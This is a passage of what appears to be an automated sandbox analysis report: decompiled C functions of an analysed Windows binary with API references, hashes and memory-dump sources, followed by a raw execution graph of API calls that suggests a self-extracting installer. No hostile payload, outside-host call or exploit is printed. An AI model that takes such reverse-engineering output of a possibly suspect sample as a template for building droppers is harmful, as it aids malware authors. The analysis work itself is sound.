                                                                        • Instruction ID: 88de10d7dccbf8266f391e33e713d971de3812968ea6c7b42a0f7a4ccaddbde3
                                                                        • Opcode Fuzzy Hash: 675689541d853be78f81a5fc2b613b3d459f80bb08f51d12967aeb22cca5be67
                                                                        • Instruction Fuzzy Hash: 2A01A7739042247BDF308BE65C4DEEB767CEBC5B10F000219F905E2180D760C641C6A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00A36517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                        				struct HRSRC__* _t6;
                                                                        				void* _t21;
                                                                        				struct HINSTANCE__* _t23;
                                                                        				int _t24;
                                                                        
                                                                        				_t23 =  *0xa39a3c; // 0xa30000
                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                        				if(_t6 == 0) {
                                                                        					L6:
                                                                        					E00A344B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                        					_t24 = _a16;
                                                                        				} else {
                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                        					if(_t21 == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						if(_a12 != 0) {
                                                                        							_push(_a12);
                                                                        						} else {
                                                                        							_push(0);
                                                                        						}
                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                        						FreeResource(_t21);
                                                                        						if(_t24 == 0xffffffff) {
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t24;
                                                                        			}








                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00A30000,000007D6,00000005), ref: 00A3652A
                                                                        • LoadResource.KERNEL32(00A30000,00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A36538
                                                                        • DialogBoxIndirectParamA.USER32(00A30000,00000000,00000547,00A319E0,00000000), ref: 00A36557
                                                                        • FreeResource.KERNEL32(00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A36560
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                        • String ID:
                                                                        • API String ID: 1214682469-0
                                                                        • Opcode ID: 7aaa74b917b3964d19332d5813aec858c011bbdf42499e2d432dae3064f56507
                                                                        • Instruction ID: 3d19b0ae68ba6a92df95ca613211058d5ee0c4cd5636b30814ce67220ed1dcd5
                                                                        • Opcode Fuzzy Hash: 7aaa74b917b3964d19332d5813aec858c011bbdf42499e2d432dae3064f56507
                                                                        • Instruction Fuzzy Hash: 53014972100615BBCB109FA9AC48DBB7A7CEB99360F004235FE50D3150D771CC11CAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E00A365E8(char* __ecx) {
                                                                        				char _t3;
                                                                        				char _t10;
                                                                        				char* _t12;
                                                                        				char* _t14;
                                                                        				char* _t15;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t12 = __ecx;
                                                                        				_t15 = __ecx;
                                                                        				_t14 =  &(__ecx[1]);
                                                                        				_t10 = 0;
                                                                        				do {
                                                                        					_t3 =  *_t12;
                                                                        					_t12 =  &(_t12[1]);
                                                                        				} while (_t3 != 0);
                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                        				while(1) {
                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                        					if(_t16 <= _t15) {
                                                                        						break;
                                                                        					}
                                                                        					if( *_t16 == 0x5c) {
                                                                        						L7:
                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                        							_t16 = CharNextA(_t16);
                                                                        						}
                                                                        						 *_t16 = _t10;
                                                                        						_t10 = 1;
                                                                        					} else {
                                                                        						_push(_t16);
                                                                        						continue;
                                                                        					}
                                                                        					L11:
                                                                        					return _t10;
                                                                        				}
                                                                        				if( *_t16 == 0x5c) {
                                                                        					goto L7;
                                                                        				}
                                                                        				goto L11;
                                                                        			}










                                                                        APIs
                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A32B33), ref: 00A36602
                                                                        • CharPrevA.USER32(?,00000000), ref: 00A36612
                                                                        • CharPrevA.USER32(?,00000000), ref: 00A36629
                                                                        • CharNextA.USER32(00000000), ref: 00A36635
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Prev$Next
                                                                        • String ID:
                                                                        • API String ID: 3260447230-0
                                                                        • Opcode ID: c37961ba780bf64311d343bbfae03fe61d31de200f78958bb25f72e4f31739e9
                                                                        • Instruction ID: 3c9e091bfe455270b85b178f107b94664f49c5e0202f06582b189ad01a6fb337
                                                                        • Opcode Fuzzy Hash: c37961ba780bf64311d343bbfae03fe61d31de200f78958bb25f72e4f31739e9
                                                                        • Instruction Fuzzy Hash: 12F028320041A07EE7365B689C88CBBBF9CCFAB395F2942AFF4D282011D7150D078671
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A369B0() {
                                                                        				intOrPtr* _t4;
                                                                        				intOrPtr* _t5;
                                                                        				void* _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        
                                                                        				 *0xa381f8 = E00A36C70();
                                                                        				__set_app_type(E00A36FBE(2));
                                                                        				 *0xa388a4 =  *0xa388a4 | 0xffffffff;
                                                                        				 *0xa388a8 =  *0xa388a8 | 0xffffffff;
                                                                        				_t4 = __p__fmode();
                                                                        				_t11 =  *0xa38528; // 0x0
                                                                        				 *_t4 = _t11;
                                                                        				_t5 = __p__commode();
                                                                        				_t12 =  *0xa3851c; // 0x0
                                                                        				 *_t5 = _t12;
                                                                        				_t6 = E00A37000();
                                                                        				if( *0xa38000 == 0) {
                                                                        					__setusermatherr(E00A37000);
                                                                        				}
                                                                        				E00A371EF(_t6);
                                                                        				return 0;
                                                                        			}









                                                                        APIs
                                                                          • Part of subcall function 00A36FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A36FC5
                                                                        • __set_app_type.MSVCRT ref: 00A369C2
                                                                        • __p__fmode.MSVCRT ref: 00A369D8
                                                                        • __p__commode.MSVCRT ref: 00A369E6
                                                                        • __setusermatherr.MSVCRT ref: 00A36A07
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                        • String ID:
                                                                        • API String ID: 1632413811-0
                                                                        • Opcode ID: dc8fe1ac99cc61bdf958b6e255f1aa50804a9ecd09f79ab0132d3874a1d4f77b
                                                                        • Instruction ID: 80bf0f5cbbf60fc0c687180d6e135b499a274feec342aef14426ffaac320e824
                                                                        • Opcode Fuzzy Hash: dc8fe1ac99cc61bdf958b6e255f1aa50804a9ecd09f79ab0132d3874a1d4f77b
                                                                        • Instruction Fuzzy Hash: C2F015B0508301DFC768EBF0EE0A6597BA1FB25331F104A09F4A2862F1CF7E8542CA11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:26.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:969
                                                                        Total number of Limit Nodes:43
RegQueryValueExA 2664->2666 2665->2662 2666->2665 2668 f83bdb 2667->2668 2683 f83bec 2667->2683 2669 f8468f 7 API calls 2668->2669 2669->2683 2670 f83c03 memset 2670->2683 2671 f83d13 2672 f844b9 20 API calls 2671->2672 2673 f83d26 2672->2673 2675 f83f4d 2673->2675 2676 f86ce0 4 API calls 2675->2676 2679 f83f60 2676->2679 2677 f83fd7 2677->2675 3003 f82267 2677->3003 2678 f83d7b CompareStringA 2678->2677 2678->2683 2679->2316 2681 f83fab 2684 f844b9 20 API calls 2681->2684 2683->2670 2683->2671 2683->2675 2683->2677 2683->2678 2683->2681 2685 f83f1e LocalFree 2683->2685 2686 f83f46 LocalFree 2683->2686 2690 f8468f 7 API calls 2683->2690 2691 f83cc7 CompareStringA 2683->2691 2701 f83e10 2683->2701 2913 f81ae8 2683->2913 2953 f8202a memset memset RegCreateKeyExA 2683->2953 2979 f83fef 2683->2979 2688 f83fbe LocalFree 2684->2688 2685->2677 2685->2683 2686->2675 2688->2675 2690->2683 2691->2683 2692 f83e1f GetProcAddress 2694 f83f64 2692->2694 2692->2701 2693 f83f92 2695 f844b9 20 API calls 2693->2695 2696 f844b9 20 API calls 2694->2696 2697 f83fa9 2695->2697 2698 f83f75 FreeLibrary 2696->2698 2699 f83f7c LocalFree 2697->2699 2698->2699 2700 f86285 GetLastError 2699->2700 2700->2673 2701->2692 2701->2693 2702 f83eff FreeLibrary 2701->2702 2703 f83f40 FreeLibrary 2701->2703 2993 f86495 2701->2993 2702->2685 2703->2686 2705 f8468f 7 API calls 2704->2705 2706 f83a55 LocalAlloc 2705->2706 2707 f83a6c 2706->2707 2708 f83a8e 2706->2708 2710 f844b9 20 API calls 2707->2710 2709 f8468f 7 API calls 2708->2709 2712 f83a98 2709->2712 2711 f83a7d 2710->2711 2713 f86285 GetLastError 2711->2713 2714 f83a9c 2712->2714 2715 f83ac5 lstrcmpA 2712->2715 2722 f82f64 2713->2722 2716 f844b9 20 API calls 2714->2716 2717 f83ada 2715->2717 2718 f83b0d LocalFree 2715->2718 2719 f83aad LocalFree 2716->2719 2720 f86517 24 API calls 2717->2720 2718->2722 2719->2722 2721 f83aec LocalFree 2720->2721 2721->2722 2722->2277 2722->2312 2724 f8303c 2723->2724 2724->2312 2726 f8468f 7 API calls 2725->2726 
2727 f8417d LocalAlloc 2726->2727 2728 f841a8 2727->2728 2729 f84195 2727->2729 2731 f8468f 7 API calls 2728->2731 2730 f844b9 20 API calls 2729->2730 2732 f841a6 2730->2732 2733 f841b5 2731->2733 2732->2312 2734 f841b9 2733->2734 2735 f841c5 lstrcmpA 2733->2735 2737 f844b9 20 API calls 2734->2737 2735->2734 2736 f841e6 LocalFree 2735->2736 2736->2732 2737->2736 2739 f8171e _vsnprintf 2738->2739 2740 f862c9 FindResourceA 2739->2740 2742 f862cb LoadResource LockResource 2740->2742 2743 f86353 2740->2743 2742->2743 2746 f862e0 2742->2746 2744 f86ce0 4 API calls 2743->2744 2745 f851ca 2744->2745 2745->2583 2745->2584 2747 f8631b FreeResource 2746->2747 2748 f86355 FreeResource 2746->2748 2749 f8171e _vsnprintf 2747->2749 2748->2743 2749->2740 2751 f8548a 2750->2751 2768 f8551a 2750->2768 2811 f853a1 2751->2811 2753 f85581 2757 f86ce0 4 API calls 2753->2757 2756 f85495 2756->2753 2760 f8550c 2756->2760 2761 f854c2 GetSystemInfo 2756->2761 2762 f8559a 2757->2762 2758 f8553b CreateDirectoryA 2763 f85577 2758->2763 2764 f85547 2758->2764 2759 f8554d 2759->2753 2765 f8597d 34 API calls 2759->2765 2766 f8658a CharPrevA 2760->2766 2772 f854da 2761->2772 2762->2624 2774 f82630 GetWindowsDirectoryA 2762->2774 2767 f86285 GetLastError 2763->2767 2764->2759 2770 f8555c 2765->2770 2766->2768 2769 f8557c 2767->2769 2822 f858c8 2768->2822 2769->2753 2770->2753 2773 f85568 RemoveDirectoryA 2770->2773 2771 f8658a CharPrevA 2771->2760 2772->2760 2772->2771 2773->2753 2775 f8265e 2774->2775 2776 f8266f 2774->2776 2778 f844b9 20 API calls 2775->2778 2777 f86ce0 4 API calls 2776->2777 2779 f82687 2777->2779 2778->2776 2779->2610 2779->2626 2781 f8696e GetDiskFreeSpaceA 2780->2781 2782 f869a1 2780->2782 2781->2782 2783 f86989 MulDiv 2781->2783 2782->2629 2783->2782 2785 f859bb 2784->2785 2786 f859dd GetDiskFreeSpaceA 2784->2786 2787 f844b9 20 API calls 2785->2787 2788 f85ba1 memset 2786->2788 2789 f85a21 MulDiv 2786->2789 2790 f859cc 2787->2790 2791 f86285 GetLastError 2788->2791 
2789->2788 2792 f85a50 GetVolumeInformationA 2789->2792 2793 f86285 GetLastError 2790->2793 2794 f85bbc GetLastError FormatMessageA 2791->2794 2795 f85a6e memset 2792->2795 2796 f85ab5 SetCurrentDirectoryA 2792->2796 2798 f859d1 2793->2798 2799 f85be3 2794->2799 2800 f86285 GetLastError 2795->2800 2797 f85acc 2796->2797 2806 f85b0a 2797->2806 2808 f85b20 2797->2808 2809 f85b94 2798->2809 2801 f844b9 20 API calls 2799->2801 2802 f85a89 GetLastError FormatMessageA 2800->2802 2804 f85bf5 SetCurrentDirectoryA 2801->2804 2802->2799 2803 f86ce0 4 API calls 2805 f85c11 2803->2805 2804->2809 2805->2610 2807 f844b9 20 API calls 2806->2807 2807->2798 2808->2809 2834 f8268b 2808->2834 2809->2803 2813 f853bf 2811->2813 2812 f8171e _vsnprintf 2812->2813 2813->2812 2814 f8658a CharPrevA 2813->2814 2818 f85415 GetTempFileNameA 2813->2818 2815 f853fa RemoveDirectoryA GetFileAttributesA 2814->2815 2815->2813 2816 f8544f CreateDirectoryA 2815->2816 2817 f8543a 2816->2817 2816->2818 2820 f86ce0 4 API calls 2817->2820 2818->2817 2819 f85429 DeleteFileA CreateDirectoryA 2818->2819 2819->2817 2821 f85449 2820->2821 2821->2756 2823 f858d8 2822->2823 2823->2823 2824 f858df LocalAlloc 2823->2824 2825 f85919 2824->2825 2826 f858f3 2824->2826 2829 f8658a CharPrevA 2825->2829 2827 f844b9 20 API calls 2826->2827 2833 f85906 2827->2833 2828 f86285 GetLastError 2830 f85534 2828->2830 2831 f85931 CreateFileA LocalFree 2829->2831 2830->2758 2830->2759 2832 f8595b CloseHandle GetFileAttributesA 2831->2832 2831->2833 2832->2833 2833->2828 2833->2830 2835 f826b9 2834->2835 2836 f826e5 2834->2836 2837 f8171e _vsnprintf 2835->2837 2838 f826ea 2836->2838 2839 f8271f 2836->2839 2840 f826cc 2837->2840 2841 f8171e _vsnprintf 2838->2841 2842 f8171e _vsnprintf 2839->2842 2849 f826e3 2839->2849 2844 f844b9 20 API calls 2840->2844 2845 f826fd 2841->2845 2847 f82735 2842->2847 2843 f86ce0 4 API calls 2848 f8276d 2843->2848 2844->2849 2846 f844b9 20 API calls 2845->2846 2846->2849 2850 f844b9 20 API calls 
2847->2850 2848->2809 2849->2843 2850->2849 2852 f8468f 7 API calls 2851->2852 2853 f84ff5 FindResourceA LoadResource LockResource 2852->2853 2854 f85020 2853->2854 2870 f8515f 2853->2870 2855 f85029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2854->2855 2856 f85057 2854->2856 2855->2856 2873 f84efd 2856->2873 2859 f85060 2860 f844b9 20 API calls 2859->2860 2867 f85075 2860->2867 2861 f850e8 2863 f844b9 20 API calls 2861->2863 2862 f85106 2864 f8511d 2862->2864 2865 f85110 FreeResource 2862->2865 2863->2867 2868 f8513a 2864->2868 2869 f85129 2864->2869 2865->2864 2866 f8507c 2866->2861 2866->2862 2867->2862 2868->2870 2872 f8514c SendMessageA 2868->2872 2871 f844b9 20 API calls 2869->2871 2870->2653 2871->2868 2872->2870 2874 f84f4a 2873->2874 2875 f84fa1 2874->2875 2881 f84980 2874->2881 2877 f86ce0 4 API calls 2875->2877 2878 f84fc6 2877->2878 2878->2859 2878->2866 2882 f84990 2881->2882 2883 f849c2 lstrcmpA 2882->2883 2884 f849a5 2882->2884 2886 f84a0e 2883->2886 2887 f849ba 2883->2887 2885 f844b9 20 API calls 2884->2885 2885->2887 2886->2887 2892 f8487a 2886->2892 2887->2875 2889 f84b60 2887->2889 2890 f84b92 FindCloseChangeNotification 2889->2890 2891 f84b76 2889->2891 2890->2891 2891->2875 2893 f848a2 CreateFileA 2892->2893 2895 f84908 2893->2895 2896 f848e9 2893->2896 2895->2887 2896->2895 2897 f848ee 2896->2897 2900 f8490c 2897->2900 2901 f84917 2900->2901 2902 f848f5 CreateFileA 2900->2902 2901->2902 2903 f84962 CharNextA 2901->2903 2904 f84953 CreateDirectoryA 2901->2904 2902->2895 2903->2901 2904->2903 2906 f8255b 2905->2906 2907 f82510 2905->2907 2909 f86ce0 4 API calls 2906->2909 2908 f8658a CharPrevA 2907->2908 2910 f82522 WritePrivateProfileStringA _lopen 2908->2910 2911 f82569 2909->2911 2910->2906 2912 f82548 _llseek _lclose 2910->2912 2911->2662 2912->2906 2914 f81b25 2913->2914 3017 f81a84 2914->3017 2916 f81b57 2917 f8658a CharPrevA 2916->2917 2918 f81b8c 2916->2918 2917->2918 2919 f866c8 2 API calls 2918->2919 2920 f81bd1 2919->2920 2921 f81bd9 
CompareStringA 2920->2921 2922 f81d73 2920->2922 2921->2922 2923 f81bf7 GetFileAttributesA 2921->2923 2924 f866c8 2 API calls 2922->2924 2928 f81d53 2923->2928 2929 f81c0d 2923->2929 2925 f81d7d 2924->2925 2926 f81df8 LocalAlloc 2925->2926 2927 f81d81 CompareStringA 2925->2927 2926->2928 2931 f81e0b GetFileAttributesA 2926->2931 2927->2926 2936 f81d9b 2927->2936 2932 f844b9 20 API calls 2928->2932 2929->2928 2930 f81a84 2 API calls 2929->2930 2933 f81c31 2930->2933 2944 f81e1d 2931->2944 2951 f81e45 2931->2951 2950 f81cc2 2932->2950 2934 f81c50 LocalAlloc 2933->2934 2939 f81a84 2 API calls 2933->2939 2934->2928 2937 f81c67 GetPrivateProfileIntA GetPrivateProfileStringA 2934->2937 2935 f81e89 2938 f86ce0 4 API calls 2935->2938 2936->2936 2940 f81dbe LocalAlloc 2936->2940 2946 f81cf8 2937->2946 2937->2950 2943 f81ea1 2938->2943 2939->2934 2940->2928 2945 f81de1 2940->2945 2943->2683 2944->2951 2949 f8171e _vsnprintf 2945->2949 2947 f81d09 GetShortPathNameA 2946->2947 2948 f81d23 2946->2948 2947->2948 2952 f8171e _vsnprintf 2948->2952 2949->2950 2950->2935 3023 f82aac 2951->3023 2952->2950 2954 f8209a 2953->2954 2955 f82256 2953->2955 2957 f8171e _vsnprintf 2954->2957 2960 f820dc 2954->2960 2956 f86ce0 4 API calls 2955->2956 2958 f82263 2956->2958 2959 f820af RegQueryValueExA 2957->2959 2958->2683 2959->2954 2959->2960 2961 f820fb GetSystemDirectoryA 2960->2961 2962 f820e4 RegCloseKey 2960->2962 2963 f8658a CharPrevA 2961->2963 2962->2955 2964 f8211b LoadLibraryA 2963->2964 2965 f82179 GetModuleFileNameA 2964->2965 2966 f8212e GetProcAddress FreeLibrary 2964->2966 2968 f821de RegCloseKey 2965->2968 2969 f82177 LocalAlloc 2965->2969 2966->2965 2967 f8214e GetSystemDirectoryA 2966->2967 2967->2969 2970 f82165 2967->2970 2968->2955 2973 f821ec 2969->2973 2974 f821cd 2969->2974 2971 f8658a CharPrevA 2970->2971 2971->2969 2976 f8171e _vsnprintf 2973->2976 2975 f844b9 20 API calls 2974->2975 2975->2968 2977 f82218 RegSetValueExA RegCloseKey LocalFree 2976->2977 2977->2955 
2980 f84106 2979->2980 2981 f84016 CreateProcessA 2979->2981 2982 f86ce0 4 API calls 2980->2982 2983 f84041 WaitForSingleObject GetExitCodeProcess 2981->2983 2984 f840c4 2981->2984 2985 f84117 2982->2985 2989 f84070 2983->2989 2986 f86285 GetLastError 2984->2986 2985->2683 2988 f840c9 GetLastError FormatMessageA 2986->2988 2991 f844b9 20 API calls 2988->2991 3050 f8411b 2989->3050 2990 f84096 CloseHandle CloseHandle 2990->2980 2992 f840ba 2990->2992 2991->2980 2992->2980 2994 f864c2 2993->2994 2995 f8658a CharPrevA 2994->2995 2996 f864d8 GetFileAttributesA 2995->2996 2997 f864ea 2996->2997 2998 f86501 LoadLibraryA 2996->2998 2997->2998 2999 f864ee LoadLibraryExA 2997->2999 3000 f86508 2998->3000 2999->3000 3001 f86ce0 4 API calls 3000->3001 3002 f86513 3001->3002 3002->2701 3004 f82289 RegOpenKeyExA 3003->3004 3005 f82381 3003->3005 3004->3005 3007 f822b1 RegQueryValueExA 3004->3007 3006 f86ce0 4 API calls 3005->3006 3008 f8238c 3006->3008 3009 f82374 RegCloseKey 3007->3009 3010 f822e6 memset GetSystemDirectoryA 3007->3010 3008->2675 3009->3005 3011 f8230f 3010->3011 3012 f82321 3010->3012 3013 f8658a CharPrevA 3011->3013 3014 f8171e _vsnprintf 3012->3014 3013->3012 3015 f8233f 3014->3015 3015->3015 3016 f82353 RegSetValueExA 3015->3016 3016->3009 3018 f81a9a 3017->3018 3020 f81aba 3018->3020 3022 f81aaf 3018->3022 3036 f8667f 3018->3036 3020->2916 3021 f8667f 2 API calls 3021->3022 3022->3020 3022->3021 3024 f82be6 3023->3024 3025 f82ad4 GetModuleFileNameA 3023->3025 3026 f86ce0 4 API calls 3024->3026 3035 f82b02 3025->3035 3028 f82bf5 3026->3028 3027 f82af1 IsDBCSLeadByte 3027->3035 3028->2935 3029 f82bca CharNextA 3032 f82bd3 CharNextA 3029->3032 3030 f82b11 CharNextA CharUpperA 3031 f82b8d CharUpperA 3030->3031 3030->3035 3031->3035 3032->3035 3034 f82b43 CharPrevA 3034->3035 3035->3024 3035->3027 3035->3029 3035->3030 3035->3032 3035->3034 3041 f865e8 3035->3041 3037 f86689 3036->3037 3038 f866a5 3037->3038 3039 f86648 IsDBCSLeadByte 3037->3039 3040 f86697 
CharNextA 3037->3040 3038->3018 3039->3037 3040->3037 3042 f865f4 3041->3042 3042->3042 3043 f865fb CharPrevA 3042->3043 3044 f86611 CharPrevA 3043->3044 3045 f8661e 3044->3045 3046 f8660b 3044->3046 3047 f8663d 3045->3047 3048 f86634 CharNextA 3045->3048 3049 f86627 CharPrevA 3045->3049 3046->3044 3046->3045 3047->3035 3048->3047 3049->3047 3049->3048 3051 f84132 3050->3051 3053 f8412a 3050->3053 3054 f81ea7 3051->3054 3053->2990 3055 f81ed3 3054->3055 3056 f81eba 3054->3056 3055->3053 3057 f8256d 15 API calls 3056->3057 3057->3055 3059 f81ff0 RegOpenKeyExA 3058->3059 3060 f82026 3058->3060 3059->3060 3061 f8200f RegDeleteValueA RegCloseKey 3059->3061 3060->2320 3061->3060 3062 f84ca0 GlobalAlloc 3173 f819e0 3174 f81a03 3173->3174 3175 f81a24 GetDesktopWindow 3173->3175 3177 f81a20 3174->3177 3178 f81a16 EndDialog 3174->3178 3176 f843d0 11 API calls 3175->3176 3179 f81a33 LoadStringA SetDlgItemTextA MessageBeep 3176->3179 3180 f86ce0 4 API calls 3177->3180 3178->3177 3179->3177 3181 f81a7e 3180->3181 3182 f86a20 __getmainargs 3063 f84cd0 3064 f84d0b 3063->3064 3065 f84cf4 3063->3065 3066 f84d02 3064->3066 3069 f84dcb 3064->3069 3072 f84d25 3064->3072 3065->3066 3067 f84b60 FindCloseChangeNotification 3065->3067 3068 f86ce0 4 API calls 3066->3068 3067->3066 3070 f84e95 3068->3070 3071 f84dd4 SetDlgItemTextA 3069->3071 3073 f84de3 3069->3073 3071->3073 3072->3066 3086 f84c37 3072->3086 3073->3066 3091 f8476d 3073->3091 3077 f84e38 3077->3066 3079 f84980 25 API calls 3077->3079 3078 f84b60 FindCloseChangeNotification 3080 f84d99 SetFileAttributesA 3078->3080 3081 f84e56 3079->3081 3080->3066 3081->3066 3082 f84e64 3081->3082 3100 f847e0 LocalAlloc 3082->3100 3085 f84e6f 3085->3066 3087 f84c4c DosDateTimeToFileTime 3086->3087 3088 f84c88 3086->3088 3087->3088 3089 f84c5e LocalFileTimeToFileTime 3087->3089 3088->3066 3088->3078 3089->3088 3090 f84c70 SetFileTime 3089->3090 3090->3088 3109 f866ae GetFileAttributesA 3091->3109 3093 f8477b 3093->3077 3094 f847cc 
SetFileAttributesA 3096 f847db 3094->3096 3096->3077 3097 f86517 24 API calls 3098 f847b1 3097->3098 3098->3094 3098->3096 3099 f847c2 3098->3099 3099->3094 3101 f8480f LocalAlloc 3100->3101 3102 f847f6 3100->3102 3105 f84831 3101->3105 3108 f8480b 3101->3108 3103 f844b9 20 API calls 3102->3103 3103->3108 3106 f844b9 20 API calls 3105->3106 3107 f84846 LocalFree 3106->3107 3107->3108 3108->3085 3110 f84777 3109->3110 3110->3093 3110->3094 3110->3097 3111 f84ad0 3119 f83680 3111->3119 3114 f84ae9 3115 f84aee WriteFile 3116 f84b0f 3115->3116 3117 f84b14 3115->3117 3117->3116 3118 f84b3b SendDlgItemMessageA 3117->3118 3118->3116 3120 f83691 MsgWaitForMultipleObjects 3119->3120 3121 f836e8 3120->3121 3122 f836a9 PeekMessageA 3120->3122 3121->3114 3121->3115 3122->3120 3123 f836bc 3122->3123 3123->3120 3123->3121 3124 f836c7 DispatchMessageA 3123->3124 3125 f836d1 PeekMessageA 3123->3125 3124->3125 3125->3123 3183 f84a50 3184 f84a9f ReadFile 3183->3184 3185 f84a66 3183->3185 3186 f84abb 3184->3186 3185->3186 3187 f84a82 memcpy 3185->3187 3187->3186 3188 f83450 3189 f8345e 3188->3189 3190 f834d3 EndDialog 3188->3190 3191 f8349a GetDesktopWindow 3189->3191 3196 f83465 3189->3196 3192 f8346a 3190->3192 3193 f843d0 11 API calls 3191->3193 3194 f834ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3193->3194 3194->3192 3195 f8348c EndDialog 3195->3192 3196->3192 3196->3195 3197 f83210 3198 f83227 3197->3198 3223 f8328e EndDialog 3197->3223 3199 f833e2 GetDesktopWindow 3198->3199 3202 f83235 3198->3202 3201 f843d0 11 API calls 3199->3201 3203 f833f1 SetWindowTextA SendDlgItemMessageA 3201->3203 3204 f8324c 3202->3204 3205 f832dd GetDlgItemTextA 3202->3205 3215 f83239 3202->3215 3206 f8341f GetDlgItem EnableWindow 3203->3206 3203->3215 3208 f83251 3204->3208 3209 f832c5 EndDialog 3204->3209 3207 f83366 3205->3207 3216 f832fc 3205->3216 3206->3215 3211 f844b9 20 API calls 3207->3211 3210 f8325c LoadStringA 3208->3210 3208->3215 3209->3215 3212 f8327b 3210->3212 3213 f83294 
3210->3213 3211->3215 3219 f844b9 20 API calls 3212->3219 3235 f84224 LoadLibraryA 3213->3235 3216->3207 3218 f83331 GetFileAttributesA 3216->3218 3221 f8337c 3218->3221 3222 f8333f 3218->3222 3219->3223 3220 f832a5 SetDlgItemTextA 3220->3212 3220->3215 3224 f8658a CharPrevA 3221->3224 3225 f844b9 20 API calls 3222->3225 3223->3215 3227 f8338d 3224->3227 3226 f83351 3225->3226 3226->3215 3228 f8335a CreateDirectoryA 3226->3228 3229 f858c8 27 API calls 3227->3229 3228->3207 3228->3221 3230 f83394 3229->3230 3230->3207 3231 f833a4 3230->3231 3232 f833c7 EndDialog 3231->3232 3233 f8597d 34 API calls 3231->3233 3232->3215 3234 f833c3 3233->3234 3234->3215 3234->3232 3236 f843b2 3235->3236 3237 f84246 GetProcAddress 3235->3237 3241 f844b9 20 API calls 3236->3241 3238 f8425d GetProcAddress 3237->3238 3239 f843a4 FreeLibrary 3237->3239 3238->3239 3240 f84274 GetProcAddress 3238->3240 3239->3236 3240->3239 3242 f8428b 3240->3242 3244 f8329d 3241->3244 3243 f84295 GetTempPathA 3242->3243 3249 f842e1 3242->3249 3245 f842ad 3243->3245 3244->3215 3244->3220 3245->3245 3246 f842b4 CharPrevA 3245->3246 3247 f842d0 CharPrevA 3246->3247 3246->3249 3247->3249 3248 f84390 FreeLibrary 3248->3244 3249->3248 3126 f84cc0 GlobalFree 3127 f86f40 SetUnhandledExceptionFilter 3250 f84bc0 3252 f84bd7 3250->3252 3253 f84c05 3250->3253 3251 f84c1b SetFilePointer 3251->3252 3253->3251 3253->3252 3254 f830c0 3255 f830de CallWindowProcA 3254->3255 3256 f830ce 3254->3256 3257 f830da 3255->3257 3256->3255 3256->3257 3258 f863c0 3259 f86407 3258->3259 3260 f8658a CharPrevA 3259->3260 3261 f86415 CreateFileA 3260->3261 3262 